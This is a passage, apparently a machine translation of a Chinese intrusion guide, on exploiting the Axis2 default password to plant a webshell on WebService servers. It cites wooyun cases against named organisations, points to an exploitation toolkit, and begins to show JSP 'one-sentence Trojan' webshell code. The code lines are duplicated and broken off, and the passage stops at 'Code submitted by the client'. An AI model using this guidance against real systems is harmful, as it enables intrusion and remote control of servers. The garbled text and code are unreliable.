Attackers can exploit the Axis2 default password security vulnerability to intrude into the WebService website.
Recently, wooyun has followed several penetration tests using the Axis2 default password. The penetration ideas are basically the same, and the technical tools used are roughly the same, I have expanded my technical thinking on the basis of summing up these cases.
Use Case of wooyun Axis2 default password security weakness:
Airline security: Getshell caused by a system vulnerability in Sichuan Airlines (affecting the security of more than 60 hosts on the Intranet \ visual inspection has been infiltrated by others)
A weak password exists in axis2 of a server in lexintong to upload webshell (root permission)
Arbitrary code execution in the Web-services (axis2) system of the Chinese Emy of Sciences
Tool preparation:
Axis2 exploitation Toolkit: cat. arr
Cat. arr tool description and download see Daniel "PHP to Java" blog http://javaweb.org /? P = 1548
JSP one-sentence Trojan
One-sentence Trojan code on the server:
<% If (request. getparameter ("f ")! = Null) (new>
<% If (request. getparameter ("f ")! = Null) (new>
Code submitted by the client: